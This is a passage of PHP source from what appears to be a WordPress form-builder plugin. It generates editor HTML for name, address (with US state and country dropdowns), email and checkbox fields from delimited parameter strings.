              $w_name_format = '<div id="'.$id.'_td_name_input_first" style="display: table-cell;"><input type="text" class="'.($w_first_val[0]==$w_title[0] ? "input_deactive" : "input_active").'" id="'.$id.'_element_firstform_id_temp" name="'.$id.'_element_firstform_id_temp" value="'.$w_first_val[0].'" title="'.$w_title[0].'" onfocus="delete_value(&quot;'.$id.'_element_firstform_id_temp&quot;)"onblur="return_value(&quot;'.$id.'_element_firstform_id_temp&quot;)" onchange="change_value(&quot;'.$id.'_element_firstform_id_temp&quot;)" style="margin-right: 10px; width: '.$param['w_size'].'px;"'.$param['attributes'].' disabled /></div><div id="'.$id.'_td_name_input_last" style="display: table-cell;"><input type="text" class="'.($w_first_val[1]==$w_title[1] ? "input_deactive" : "input_active").'" id="'.$id.'_element_lastform_id_temp" name="'.$id.'_element_lastform_id_temp" value="'.$w_first_val[1].'" title="'.$w_title[1].'" onfocus="delete_value(&quot;'.$id.'_element_lastform_id_temp&quot;)"onblur="return_value(&quot;'.$id.'_element_lastform_id_temp&quot;)" onchange="change_value(&quot;'.$id.'_element_lastform_id_temp&quot;)" style="margin-right: 10px; width: '.$param['w_size'].'px;" '.$param['attributes'].' disabled /></div>';
              $w_name_format_mini_labels = '<div id="'.$id.'_td_name_label_first" align="left" style="display: table-cell;"><label class="mini_label" id="'.$id.'_mini_label_first">'.$w_mini_labels[1].'</label></div><div id="'.$id.'_td_name_label_last" align="left" style="display: table-cell;"><label class="mini_label" id="'.$id.'_mini_label_last">'.$w_mini_labels[2].'</label></div>';
              
			  if($w_name_fields[0] == 'yes') {
				$w_name_format = '<div id="'.$id.'_td_name_input_title" style="display: table-cell;"><input type="text" class="'.($w_first_val[2]==$w_title[2] ? "input_deactive" : "input_active").'" id="'.$id.'_element_titleform_id_temp" name="'.$id.'_element_titleform_id_temp" value="'.$w_first_val[2].'" title="'.$w_title[2].'" onfocus="delete_value(&quot;'.$id.'_element_titleform_id_temp&quot;)" onblur="return_value(&quot;'.$id.'_element_titleform_id_temp&quot;)" onchange="change_value(&quot;'.$id.'_element_titleform_id_temp&quot;)" style="margin: 0px 10px 0px 0px; width: 40px;" disabled /></div>'.$w_name_format;
				$w_name_format_mini_labels ='<div id="'.$id.'_td_name_label_title" align="left" style="display: table-cell;"><label class="mini_label" id="'.$id.'_mini_label_title">'.$w_mini_labels[0].'</label></div>'.$w_name_format_mini_labels;
			  }
			  
			  if($w_name_fields[1] == 'yes') {
				$w_name_format = $w_name_format.'<div id="'.$id.'_td_name_input_middle" style="display: table-cell;"><input type="text" class="'.($w_first_val[3]==$w_title[3] ? "input_deactive" : "input_active").'" id="'.$id.'_element_middleform_id_temp" name="'.$id.'_element_middleform_id_temp" value="'.$w_first_val[3].'" title="'.$w_title[3].'" onfocus="delete_value(&quot;'.$id.'_element_middleform_id_temp&quot;)" onblur="return_value(&quot;'.$id.'_element_middleform_id_temp&quot;)" onchange="change_value(&quot;'.$id.'_element_middleform_id_temp&quot;)" style="width: '.$param['w_size'].'px;" disabled /></div>';
				$w_name_format_mini_labels = $w_name_format_mini_labels.'<div id="'.$id.'_td_name_label_middle" align="left" style="display: table-cell;"><label class="mini_label" id="'.$id.'_mini_label_middle">'.$w_mini_labels[3].'</label></div>';
			  }
			  
              $rep ='<div id="wdform_field'.$id.'" type="type_name" class="wdform_field" style="display: table-cell;">'.$arrows.'<div align="left" id="'.$id.'_label_sectionform_id_temp" class="'.$param['w_class'].'" style="display: '.$param['w_field_label_pos'].'; width: '.$param['w_field_label_size'].'px;"><span id="'.$id.'_element_labelform_id_temp" class="label" style="vertical-align: top;">'.$label.'</span><span id="'.$id.'_required_elementform_id_temp" class="required" style="vertical-align: top;">'.$required_sym.'</span></div><div align="left" id="'.$id.'_element_sectionform_id_temp" class="'.$param['w_class'].'" style="display: '.$param['w_field_label_pos'].';"><input type="hidden" value="type_name" name="'.$id.'_typeform_id_temp" id="'.$id.'_typeform_id_temp"><input type="hidden" value="'.$param['w_required'].'" name="'.$id.'_requiredform_id_temp" id="'.$id.'_requiredform_id_temp"><input type="hidden" value="'.$param['w_unique'].'" name="'.$id.'_uniqueform_id_temp" id="'.$id.'_uniqueform_id_temp"><input type="hidden" name="'.$id.'_enable_fieldsform_id_temp" id="'.$id.'_enable_fieldsform_id_temp" title="'.$w_name_fields[0].'" first="yes" last="yes" middle="'.$w_name_fields[1].'"><div id="'.$id.'_table_name" cellpadding="0" cellspacing="0" style="display: table;"><div id="'.$id.'_tr_name1" style="display: table-row;">'.$w_name_format.'</div><div id="'.$id.'_tr_name2" style="display: table-row;">'.$w_name_format_mini_labels.'</div></div></div></div>';
              break;
            }
            case 'type_address': {
              $params_names = array('w_field_label_size', 'w_field_label_pos', 'w_size', 'w_mini_labels', 'w_disabled_fields', 'w_required', 'w_class');
              $temp = $params;
              foreach ($params_names as $params_name) {
                $temp = explode('*:*' . $params_name . '*:*', $temp);
                $param[$params_name] = $temp[0];
                $temp = $temp[1];
              }
              if ($temp) {
                $temp	= explode('*:*w_attr_name*:*', $temp);
                $attrs = array_slice($temp, 0, count($temp) - 1);
                foreach ($attrs as $attr) {
                  $param['attributes'] = $param['attributes'] . ' add_' . $attr;
                }
              }
              $param['w_field_label_pos'] = ($param['w_field_label_pos'] == "left" ? "table-cell" : "block");
              $required_sym = ($param['w_required'] == "yes" ? " *" : "");
              $w_mini_labels = explode('***', $param['w_mini_labels']);
              $w_disabled_fields = explode('***', $param['w_disabled_fields']);
              $hidden_inputs = '';
              $labels_for_id = array('street1', 'street2', 'city', 'state', 'postal', 'country');
              foreach ($w_disabled_fields as $key => $w_disabled_field) {
                if ($key != 6) {
                  if ($w_disabled_field == 'yes') {
                    $hidden_inputs .= '<input type="hidden" id="'.$id.'_'.$labels_for_id[$key].'form_id_temp" value="'.$w_mini_labels[$key].'" id_for_label="'.($id+$key).'">';
                  }
                }
              }
              $address_fields ='';
					$g=0;
					if($w_disabled_fields[0]=='no')
					{
					$g+=2;
					$address_fields .= '<span style="float: left; width: 100%; padding-bottom: 8px; display: block;"><input type="text" id="'.$id.'_street1form_id_temp" name="'.$id.'_street1form_id_temp" onchange="change_value(&quot;'.$id.'_street1form_id_temp&quot;)" style="width: 100%;" '.$param['attributes'].' disabled /><label class="mini_label" id="'.$id.'_mini_label_street1" style="display: block;">'.$w_mini_labels[0].'</label></span>';
					}
					
					if($w_disabled_fields[1]=='no')
					{
					$g+=2;
					$address_fields .= '<span style="float: left; width: 100%; padding-bottom: 8px; display: block;"><input type="text" id="'.$id.'_street2form_id_temp" name="'.($id+1).'_street2form_id_temp" onchange="change_value(&quot;'.$id.'_street2form_id_temp&quot;)" style="width: 100%;" '.$param['attributes'].' disabled /><label class="mini_label" style="display: block;" id="'.$id.'_mini_label_street2">'.$w_mini_labels[1].'</label></span>';
					}
					
					if($w_disabled_fields[2]=='no')
					{
					$g++;
					$address_fields .= '<span style="float: left; width: 48%; padding-bottom: 8px;"><input type="text" id="'.$id.'_cityform_id_temp" name="'.($id+2).'_cityform_id_temp" onchange="change_value(&quot;'.$id.'_cityform_id_temp&quot;)" style="width: 100%;" '.$param['attributes'].' disabled /><label class="mini_label" style="display: block;" id="'.$id.'_mini_label_city">'.$w_mini_labels[2].'</label></span>';
					}
					
					if($w_disabled_fields[3]=='no')
					{
					$g++;
					if($w_disabled_fields[5]=='yes' && $w_disabled_fields[6]=='yes')
					$address_fields .= '<span style="float: '.(($g%2==0) ? 'right' : 'left').'; width: 48%; padding-bottom: 8px;"><select type="text" id="'.$id.'_stateform_id_temp" name="'.($id+3).'_stateform_id_temp" onchange="change_value(&quot;'.$id.'_stateform_id_temp&quot;)" style="width: 100%;" '.$param['attributes'].' disabled ><option value=""></option><option value="Alabama">Alabama</option><option value="Alaska">Alaska</option><option value="Arizona">Arizona</option><option value="Arkansas">Arkansas</option><option value="California">California</option><option value="Colorado">Colorado</option><option value="Connecticut">Connecticut</option><option value="Delaware">Delaware</option><option value="Florida">Florida</option><option value="Georgia">Georgia</option><option value="Hawaii">Hawaii</option><option value="Idaho">Idaho</option><option value="Illinois">Illinois</option><option value="Indiana">Indiana</option><option value="Iowa">Iowa</option><option value="Kansas">Kansas</option><option value="Kentucky">Kentucky</option><option value="Louisiana">Louisiana</option><option value="Maine">Maine</option><option value="Maryland">Maryland</option><option value="Massachusetts">Massachusetts</option><option value="Michigan">Michigan</option><option value="Minnesota">Minnesota</option><option value="Mississippi">Mississippi</option><option value="Missouri">Missouri</option><option value="Montana">Montana</option><option value="Nebraska">Nebraska</option><option value="Nevada">Nevada</option><option value="New Hampshire">New Hampshire</option><option value="New Jersey">New Jersey</option><option value="New Mexico">New Mexico</option><option value="New York">New York</option><option value="North Carolina">North Carolina</option><option value="North Dakota">North Dakota</option><option value="Ohio">Ohio</option><option value="Oklahoma">Oklahoma</option><option value="Oregon">Oregon</option><option value="Pennsylvania">Pennsylvania</option><option value="Rhode Island">Rhode Island</option><option value="South Carolina">South Carolina</option><option value="South Dakota">South Dakota</option><option value="Tennessee">Tennessee</option><option value="Texas">Texas</option><option value="Utah">Utah</option><option value="Vermont">Vermont</option><option value="Virginia">Virginia</option><option value="Washington">Washington</option><option value="West Virginia">West Virginia</option><option value="Wisconsin">Wisconsin</option><option value="Wyoming">Wyoming</option></select><label class="mini_label" style="display: block;" id="'.$id.'_mini_label_state">'.$w_mini_labels[3].'</label></span>';
					else
					$address_fields .= '<span style="float: '.(($g%2==0) ? 'right' : 'left').'; width: 48%; padding-bottom: 8px;"><input type="text" id="'.$id.'_stateform_id_temp" name="'.($id+3).'_stateform_id_temp" onchange="change_value(&quot;'.$id.'_stateform_id_temp&quot;)" style="width: 100%;" '.$param['attributes'].' disabled><label class="mini_label" style="display: block;" id="'.$id.'_mini_label_state">'.$w_mini_labels[3].'</label></span>';
					}
					
					if($w_disabled_fields[4]=='no')
					{
					$g++;
					$address_fields .= '<span style="float: '.(($g%2==0) ? 'right' : 'left').'; width: 48%; padding-bottom: 8px;"><input type="text" id="'.$id.'_postalform_id_temp" name="'.($id+4).'_postalform_id_temp" onchange="change_value(&quot;'.$id.'_postalform_id_temp&quot;)" style="width: 100%;" '.$param['attributes'].' disabled><label class="mini_label" style="display: block;" id="'.$id.'_mini_label_postal">'.$w_mini_labels[4].'</label></span>';
					}
					
					if($w_disabled_fields[5]=='no')
					{
					$g++;
					$address_fields .= '<span style="float: '.(($g%2==0) ? 'right' : 'left').'; width: 48%; padding-bottom: 8px;"><select type="text" id="'.$id.'_countryform_id_temp" name="'.($id+5).'_countryform_id_temp" onchange="change_value(&quot;'.$id.'_countryform_id_temp&quot;)" style="width: 100%;" '.$param['attributes'].' disabled><option value=""></option><option value="Afghanistan">Afghanistan</option><option value="Albania">Albania</option><option value="Algeria">Algeria</option><option value="Andorra">Andorra</option><option value="Angola">Angola</option><option value="Antigua and Barbuda">Antigua and Barbuda</option><option value="Argentina">Argentina</option><option value="Armenia">Armenia</option><option value="Australia">Australia</option><option value="Austria">Austria</option><option value="Azerbaijan">Azerbaijan</option><option value="Bahamas">Bahamas</option><option value="Bahrain">Bahrain</option><option value="Bangladesh">Bangladesh</option><option value="Barbados">Barbados</option><option value="Belarus">Belarus</option><option value="Belgium">Belgium</option><option value="Belize">Belize</option><option value="Benin">Benin</option><option value="Bhutan">Bhutan</option><option value="Bolivia">Bolivia</option><option value="Bosnia and Herzegovina">Bosnia and Herzegovina</option><option value="Botswana">Botswana</option><option value="Brazil">Brazil</option><option value="Brunei">Brunei</option><option value="Bulgaria">Bulgaria</option><option value="Burkina Faso">Burkina Faso</option><option value="Burundi">Burundi</option><option value="Cambodia">Cambodia</option><option value="Cameroon">Cameroon</option><option value="Canada">Canada</option><option value="Cape Verde">Cape Verde</option><option value="Central African Republic">Central African Republic</option><option value="Chad">Chad</option><option value="Chile">Chile</option><option value="China">China</option><option value="Colombia">Colombia</option><option value="Comoros">Comoros</option><option value="Congo (Brazzaville)">Congo (Brazzaville)</option><option value="Congo">Congo</option><option value="Costa Rica">Costa Rica</option><option value="Cote d\'Ivoire">Cote d\'Ivoire</option><option value="Croatia">Croatia</option><option value="Cuba">Cuba</option><option value="Cyprus">Cyprus</option><option value="Czech Republic">Czech Republic</option><option value="Denmark">Denmark</option><option value="Djibouti">Djibouti</option><option value="Dominica">Dominica</option><option value="Dominican Republic">Dominican Republic</option><option value="East Timor (Timor Timur)">East Timor (Timor Timur)</option><option value="Ecuador">Ecuador</option><option value="Egypt">Egypt</option><option value="El Salvador">El Salvador</option><option value="Equatorial Guinea">Equatorial Guinea</option><option value="Eritrea">Eritrea</option><option value="Estonia">Estonia</option><option value="Ethiopia">Ethiopia</option><option value="Fiji">Fiji</option><option value="Finland">Finland</option><option value="France">France</option><option value="Gabon">Gabon</option><option value="Gambia, The">Gambia, The</option><option value="Georgia">Georgia</option><option value="Germany">Germany</option><option value="Ghana">Ghana</option><option value="Greece">Greece</option><option value="Grenada">Grenada</option><option value="Guatemala">Guatemala</option><option value="Guinea">Guinea</option><option value="Guinea-Bissau">Guinea-Bissau</option><option value="Guyana">Guyana</option><option value="Haiti">Haiti</option><option value="Honduras">Honduras</option><option value="Hungary">Hungary</option><option value="Iceland">Iceland</option><option value="India">India</option><option value="Indonesia">Indonesia</option><option value="Iran">Iran</option><option value="Iraq">Iraq</option><option value="Ireland">Ireland</option><option value="Israel">Israel</option><option value="Italy">Italy</option><option value="Jamaica">Jamaica</option><option value="Japan">Japan</option><option value="Jordan">Jordan</option><option value="Kazakhstan">Kazakhstan</option><option value="Kenya">Kenya</option><option value="Kiribati">Kiribati</option><option value="Korea, North">Korea, North</option><option value="Korea, South">Korea, South</option><option value="Kuwait">Kuwait</option><option value="Kyrgyzstan">Kyrgyzstan</option><option value="Laos">Laos</option><option value="Latvia">Latvia</option><option value="Lebanon">Lebanon</option><option value="Lesotho">Lesotho</option><option value="Liberia">Liberia</option><option value="Libya">Libya</option><option value="Liechtenstein">Liechtenstein</option><option value="Lithuania">Lithuania</option><option value="Luxembourg">Luxembourg</option><option value="Macedonia">Macedonia</option><option value="Madagascar">Madagascar</option><option value="Malawi">Malawi</option><option value="Malaysia">Malaysia</option><option value="Maldives">Maldives</option><option value="Mali">Mali</option><option value="Malta">Malta</option><option value="Marshall Islands">Marshall Islands</option><option value="Mauritania">Mauritania</option><option value="Mauritius">Mauritius</option><option value="Mexico">Mexico</option><option value="Micronesia">Micronesia</option><option value="Moldova">Moldova</option><option value="Monaco">Monaco</option><option value="Mongolia">Mongolia</option><option value="Morocco">Morocco</option><option value="Mozambique">Mozambique</option><option value="Myanmar">Myanmar</option><option value="Namibia">Namibia</option><option value="Nauru">Nauru</option><option value="Nepal">Nepal</option><option value="Netherlands">Netherlands</option><option value="New Zealand">New Zealand</option><option value="Nicaragua">Nicaragua</option><option value="Niger">Niger</option><option value="Nigeria">Nigeria</option><option value="Norway">Norway</option><option value="Oman">Oman</option><option value="Pakistan">Pakistan</option><option value="Palau">Palau</option><option value="Panama">Panama</option><option value="Papua New Guinea">Papua New Guinea</option><option value="Paraguay">Paraguay</option><option value="Peru">Peru</option><option value="Philippines">Philippines</option><option value="Poland">Poland</option><option value="Portugal">Portugal</option><option value="Qatar">Qatar</option><option value="Romania">Romania</option><option value="Russia">Russia</option><option value="Rwanda">Rwanda</option><option value="Saint Kitts and Nevis">Saint Kitts and Nevis</option><option value="Saint Lucia">Saint Lucia</option><option value="Saint Vincent">Saint Vincent</option><option value="Samoa">Samoa</option><option value="San Marino">San Marino</option><option value="Sao Tome and Principe">Sao Tome and Principe</option><option value="Saudi Arabia">Saudi Arabia</option><option value="Senegal">Senegal</option><option value="Serbia and Montenegro">Serbia and Montenegro</option><option value="Seychelles">Seychelles</option><option value="Sierra Leone">Sierra Leone</option><option value="Singapore">Singapore</option><option value="Slovakia">Slovakia</option><option value="Slovenia">Slovenia</option><option value="Solomon Islands">Solomon Islands</option><option value="Somalia">Somalia</option><option value="South Africa">South Africa</option><option value="Spain">Spain</option><option value="Sri Lanka">Sri Lanka</option><option value="Sudan">Sudan</option><option value="Suriname">Suriname</option><option value="Swaziland">Swaziland</option><option value="Sweden">Sweden</option><option value="Switzerland">Switzerland</option><option value="Syria">Syria</option><option value="Taiwan">Taiwan</option><option value="Tajikistan">Tajikistan</option><option value="Tanzania">Tanzania</option><option value="Thailand">Thailand</option><option value="Togo">Togo</option><option value="Tonga">Tonga</option><option value="Trinidad and Tobago">Trinidad and Tobago</option><option value="Tunisia">Tunisia</option><option value="Turkey">Turkey</option><option value="Turkmenistan">Turkmenistan</option><option value="Tuvalu">Tuvalu</option><option value="Uganda">Uganda</option><option value="Ukraine">Ukraine</option><option value="United Arab Emirates">United Arab Emirates</option><option value="United Kingdom">United Kingdom</option><option value="United States">United States</option><option value="Uruguay">Uruguay</option><option value="Uzbekistan">Uzbekistan</option><option value="Vanuatu">Vanuatu</option><option value="Vatican City">Vatican City</option><option value="Venezuela">Venezuela</option><option value="Vietnam">Vietnam</option><option value="Yemen">Yemen</option><option value="Zambia">Zambia</option><option value="Zimbabwe">Zimbabwe</option></select><label class="mini_label" style="display: block;" id="'.$id.'_mini_label_country">'.$w_mini_labels[5].'</span>';
					}				
				
					$rep ='<div id="wdform_field'.$id.'" type="type_address" class="wdform_field" style="display: table-cell;">'.$arrows.'<div align="left" id="'.$id.'_label_sectionform_id_temp" class="'.$param['w_class'].'" style="display: '.$param['w_field_label_pos'].'; width: '.$param['w_field_label_size'].'px; vertical-align:top;"><span id="'.$id.'_element_labelform_id_temp" class="label" style="vertical-align: top;">'.$label.'</span><span id="'.$id.'_required_elementform_id_temp" class="required" style="vertical-align: top;">'.$required_sym.'</span></div><div align="left" id="'.$id.'_element_sectionform_id_temp" class="'.$param['w_class'].'" style="display: '.$param['w_field_label_pos'].';"><input type="hidden" value="type_address" name="'.$id.'_typeform_id_temp" id="'.$id.'_typeform_id_temp"><input type="hidden" value="'.$param['w_required'].'" name="'.$id.'_requiredform_id_temp" id="'.$id.'_requiredform_id_temp"><input type="hidden" name="'.$id.'_disable_fieldsform_id_temp" id="'.$id.'_disable_fieldsform_id_temp" street1="'.$w_disabled_fields[0].'" street2="'.$w_disabled_fields[1].'" city="'.$w_disabled_fields[2].'" state="'.$w_disabled_fields[3].'" postal="'.$w_disabled_fields[4].'" country="'.$w_disabled_fields[5].'" us_states="'.$w_disabled_fields[6].'"><div id="'.$id.'_div_address" style="width: '.$param['w_size'].'px;">'.$address_fields.$hidden_inputs.'</div></div></div>';
					break;
            }
            case 'type_submitter_mail': {
              $params_names=array('w_field_label_size','w_field_label_pos','w_size','w_first_val','w_title','w_required','w_unique', 'w_class');
              $temp=$params;
              foreach($params_names as $params_name )
              {	
                $temp=explode('*:*'.$params_name.'*:*',$temp);
                $param[$params_name] = $temp[0];
                $temp=$temp[1];
              }

              if($temp)
              {	
                $temp	=explode('*:*w_attr_name*:*',$temp);
                $attrs	= array_slice($temp,0, count($temp)-1);   
                foreach($attrs as $attr)
                  $param['attributes'] = $param['attributes'].' add_'.$attr;
              }

              $param['w_field_label_pos'] = ($param['w_field_label_pos']=="left" ? "table-cell" : "block");	
              $input_active = ($param['w_first_val']==$param['w_title'] ? "input_deactive" : "input_active");	
              $required_sym = ($param['w_required']=="yes" ? " *" : "");	
            
              $rep ='<div id="wdform_field'.$id.'" type="type_submitter_mail" class="wdform_field" style="display: table-cell;">'.$arrows.'<div align="left" id="'.$id.'_label_sectionform_id_temp" class="'.$param['w_class'].'" style="display: '.$param['w_field_label_pos'].'; width: '.$param['w_field_label_size'].'px;"><span id="'.$id.'_element_labelform_id_temp" class="label" style="vertical-align: top;">'.$label.'</span><span id="'.$id.'_required_elementform_id_temp" class="required" style="vertical-align: top;">'.$required_sym.'</span></div><div align="left" id="'.$id.'_element_sectionform_id_temp" class="'.$param['w_class'].'" style="display: '.$param['w_field_label_pos'].';"><input type="hidden" value="type_submitter_mail" name="'.$id.'_typeform_id_temp" id="'.$id.'_typeform_id_temp"><input type="hidden" value="'.$param['w_required'].'" name="'.$id.'_requiredform_id_temp" id="'.$id.'_requiredform_id_temp"><input type="hidden" value="'.$param['w_unique'].'" name="'.$id.'_uniqueform_id_temp" id="'.$id.'_uniqueform_id_temp"><input type="text" class="'.$input_active.'" id="'.$id.'_elementform_id_temp" name="'.$id.'_elementform_id_temp" value="'.$param['w_first_val'].'" title="'.$param['w_title'].'" onfocus="delete_value(&quot;'.$id.'_elementform_id_temp&quot;)" onblur="return_value(&quot;'.$id.'_elementform_id_temp&quot;)" onchange="change_value(&quot;'.$id.'_elementform_id_temp&quot;)" style="width: '.$param['w_size'].'px;" '.$param['attributes'].' disabled /></div></div>';
              break;
            }
            case 'type_checkbox':
            {
              $params_names=array('w_field_label_size','w_field_label_pos','w_flow','w_choices','w_choices_checked','w_rowcol', 'w_required','w_randomize','w_allow_other','w_allow_other_num','w_class');
              $temp=$params;
			  if(strpos($temp, 'w_field_option_pos') > -1)
						$params_names=array('w_field_label_size','w_field_label_pos','w_field_option_pos','w_flow','w_choices','w_choices_checked','w_rowcol', 'w_required','w_randomize','w_allow_other','w_allow_other_num', 'w_value_disabled','w_choices_value', 'w_choices_params', 'w_class');
              foreach($params_names as $params_name )
              {	
                $temp=explode('*:*'.$params_name.'*:*',$temp);
                $param[$params_name] = $temp[0];
                $temp=$temp[1];
              }

              if($temp)
              {	
                $temp	=explode('*:*w_attr_name*:*',$temp);
                $attrs	= array_slice($temp,0, count($temp)-1);   
                foreach($attrs as $attr)
                  $param['attributes'] = $param['attributes'].' add_'.$attr;
              }
               if(!isset($param['w_value_disabled']))
						$param['w_value_disabled'] = 'no';
					
			   if(!isset($param['w_field_option_pos']))
						$param['w_field_option_pos'] = 'left';
						
              $param['w_field_label_pos'] = ($param['w_field_label_pos']=="left" ? "table-cell" : "block");	
              $required_sym = ($param['w_required']=="yes" ? " *" : "");	
              $param['w_choices']	= explode('***',$param['w_choices']);
              $param['w_choices_checked']	= explode('***',$param['w_choices_checked']);
			  
              if(isset($param['w_choices_value']))
				{
					$param['w_choices_value'] = explode('***',$param['w_choices_value']);
					$param['w_choices_params'] = explode('***',$param['w_choices_params']);	
				}
					
              foreach($param['w_choices_checked'] as $key => $choices_checked )
              {
                if($choices_checked=='true')
                  $param['w_choices_checked'][$key]='checked="checked"';
                else
                  $param['w_choices_checked'][$key]='';
              }
              
              $rep='<div id="wdform_field'.$id.'" type="type_checkbox" class="wdform_field" style="display: table-cell;">'.$arrows.'<div align="left" id="'.$id.'_label_sectionform_id_temp" class="'.$param['w_class'].'" style="display: '.$param['w_field_label_pos'].'; width: '.$param['w_field_label_size'].'px;"><span id="'.$id.'_element_labelform_id_temp" class="label" style="vertical-align: top;">'.$label.'</span><span id="'.$id.'_required_elementform_id_temp" class="required" style="vertical-align: top;">'.$required_sym.'</span></div><div align="left" id="'.$id.'_element_sectionform_id_temp" class="'.$param['w_class'].'" style="display: '.$param['w_field_label_pos'].';"><input type="hidden" value="type_checkbox" name="'.$id.'_typeform_id_temp" id="'.$id.'_typeform_id_temp"><input type="hidden" value="'.$param['w_required'].'" name="'.$id.'_requiredform_id_temp" id="'.$id.'_requiredform_id_temp"><input type="hidden" value="'.$param['w_randomize'].'" name="'.$id.'_randomizeform_id_temp" id="'.$id.'_randomizeform_id_temp"><input type="hidden" value="'.$param['w_allow_other'].'" name="'.$id.'_allow_otherform_id_temp" id="'.$id.'_allow_otherform_id_temp"><input type="hidden" value="'.$param['w_allow_other_num'].'" name="'.$id.'_allow_other_numform_id_temp" id="'.$id.'_allow_other_numform_id_temp"><input type="hidden" value="'.$param['w_rowcol'].'" name="'.$id.'_rowcol_numform_id_temp" id="'.$id.'_rowcol_numform_id_temp"><input type="hidden" value="'.$param['w_field_option_pos'].'" id="'.$id.'_option_left_right"><input type="hidden" value="'.$param['w_value_disabled'].'" name="'.$id.'_value_disabledform_id_temp" id="'.$id.'_value_disabledform_id_temp"><div style="display: table;"><div id="'.$id.'_table_little" style="display: table-row-group;" '.($param['w_flow']=='hor' ? 'for_hor="'.$id.'_hor"' : '').'>';
				
            if($param['w_flow']=='hor')
            {
                $j = 0;
                for($i=0; $i<(int)$param['w_rowcol']; $i++)
                {
                  $rep.='<div id="'.$id.'_element_tr'.$i.'" style="display: table-row;">';
                  
                    for($l=0; $l<=(int)(count($param['w_choices'])/$param['w_rowcol']); $l++)
                    {
                      if($j >= count($param['w_choices'])%$param['w_rowcol'] && $l==(int)(count($param['w_choices'])/$param['w_rowcol']))
                      continue;
                      
                      if($param['w_allow_other']=="yes" && $param['w_allow_other_num']==(int)$param['w_rowcol']*$i+$l)
							         $rep.='<div valign="top" id="'.$id.'_td_little'.((int)$param['w_rowcol']*$l+$i).'" idi="'.((int)$param['w_rowcol']*$l+$i).'" style="display: table-cell;"><input type="checkbox" value="" id="'.$id.'_elementform_id_temp'.((int)$param['w_rowcol']*$l+$i).'" name="'.$id.'_elementform_id_temp'.((int)$param['w_rowcol']*$l+$i).'" other="1" onclick="if(set_checked(&quot;'.$id.'&quot;,&quot;'.((int)$param['w_rowcol']*$l+$i).'&quot;,&quot;form_id_temp&quot;)) show_other_input(&quot;'.$id.'&quot;,&quot;form_id_temp&quot;);" '.$param['w_choices_checked'][(int)$param['w_rowcol']*$l+$i].' '.$param['attributes'].' '.($param['w_field_option_pos']=='right' ? 'style="float:left !important;"' : "").' disabled  /><label id="'.$id.'_label_element'.((int)$param['w_rowcol']*$l+$i).'" class="ch-rad-label" for="'.$id.'_elementform_id_temp'.((int)$param['w_rowcol']*$l+$i).'">'.$param['w_choices'][(int)$param['w_rowcol']*$l+$i].'</label></div>';
								else	
									{
										$where = '';
										$order_by = '';
										$db_info = '';
										if(isset($param['w_choices_value']))
											$choise_value = $param['w_choices_value'][(int)$param['w_rowcol']*$l+$i];
										else
											$choise_value = $param['w_choices'][(int)$param['w_rowcol']*$l+$i];
									
										if(isset($param['w_choices_params']) && $param['w_choices_params'][(int)$param['w_rowcol']*$l+$i])
										{
											$w_choices_params = explode('[where_order_by]',$param['w_choices_params'][(int)$param['w_rowcol']*$l+$i]);
											$where = "where='".$w_choices_params[0]."'";
											$w_choices_params = explode('[db_info]',$w_choices_params[1]);
											$order_by = "order_by='".$w_choices_params[0]."'";
											$db_info = "db_info='".$w_choices_params[1]."'";
										}
									
										$rep.='<div valign="top" id="'.$id.'_td_little'.((int)$param['w_rowcol']*$l+$i).'" idi="'.((int)$param['w_rowcol']*$l+$i).'" style="display: table-cell;"><input type="checkbox" value="'.$choise_value.'" id="'.$id.'_elementform_id_temp'.((int)$param['w_rowcol']*$l+$i).'" name="'.$id.'_elementform_id_temp'.((int)$param['w_rowcol']*$l+$i).'" onclick="set_checked(&quot;'.$id.'&quot;,&quot;'.((int)$param['w_rowcol']*$l+$i).'&quot;,&quot;form_id_temp&quot;)" '.$param['w_choices_checked'][(int)$param['w_rowcol']*$l+$i].' '.$param['attributes'].' '.($param['w_field_option_pos']=='right' ? 'style="float:left !important;"' : "").' disabled/><label id="'.$id.'_label_element'.((int)$param['w_rowcol']*$l+$i).'" class="ch-rad-label" for="'.$id.'_elementform_id_temp'.((int)$param['w_rowcol']*$l+$i).'" '.$where.' '.$order_by.' '.$db_info.'>'.$param['w_choices'][(int)$param['w_rowcol']*$l+$i].'</label></div>';	
									}
                    }
                  
                  $j++;
                  $rep.='</div>';	
                  
                }
          
            }
            else
            {
                for($i=0; $i<(int)(count($param['w_choices'])/$param['w_rowcol']); $i++)
                {
                  $rep.='<div id="'.$id.'_element_tr'.$i.'" style="display: table-row;">';
							
							if(count($param['w_choices']) > (int)$param['w_rowcol'])
								for($l=0; $l<$param['w_rowcol']; $l++)
								{
									if($param['w_allow_other']=="yes" && $param['w_allow_other_num']==(int)$param['w_rowcol']*$i+$l)
										$rep.='<div valign="top" id="'.$id.'_td_little'.((int)$param['w_rowcol']*$i+$l).'" idi="'.((int)$param['w_rowcol']*$i+$l).'" style="display: table-cell;"><input type="checkbox" value="" id="'.$id.'_elementform_id_temp'.((int)$param['w_rowcol']*$i+$l).'" name="'.$id.'_elementform_id_temp'.((int)$param['w_rowcol']*$i+$l).'" other="1" onclick="if(set_checked(&quot;'.$id.'&quot;,&quot;'.((int)$param['w_rowcol']*$i+$l).'&quot;,&quot;form_id_temp&quot;)) show_other_input(&quot;'.$id.'&quot;,&quot;form_id_temp&quot;);" '.$param['w_choices_checked'][(int)$param['w_rowcol']*$i+$l].' '.$param['attributes'].' '.($param['w_field_option_pos']=='right' ? 'style="float:left !important;"' : "").' disabled /><label id="'.$id.'_label_element'.((int)$param['w_rowcol']*$i+$l).'" class="ch-rad-label" for="'.$id.'_elementform_id_temp'.((int)$param['w_rowcol']*$i+$l).'">'.$param['w_choices'][(int)$param['w_rowcol']*$i+$l].'</label></div>';
										else
									{
										$where = '' ;
										$order_by = '' ;
										$db_info = '' ;
										if(isset($param['w_choices_value']))
											$choise_value =	$param['w_choices_value'][(int)$param['w_rowcol']*$i+$l]; 
										else
											$choise_value = $param['w_choices'][(int)$param['w_rowcol']*$i+$l];

										if(isset($param['w_choices_params']) && $param['w_choices_params'][(int)$param['w_rowcol']*$i+$l])
										{
											$w_choices_params = explode('[where_order_by]',$param['w_choices_params'][(int)$param['w_rowcol']*$i+$l]);
											$where = "where='".$w_choices_params[0]."'";
											$w_choices_params = explode('[db_info]',$w_choices_params[1]);
											$order_by = "order_by='".$w_choices_params[0]."'";
											$db_info = "db_info='".$w_choices_params[1]."'";
										}
									
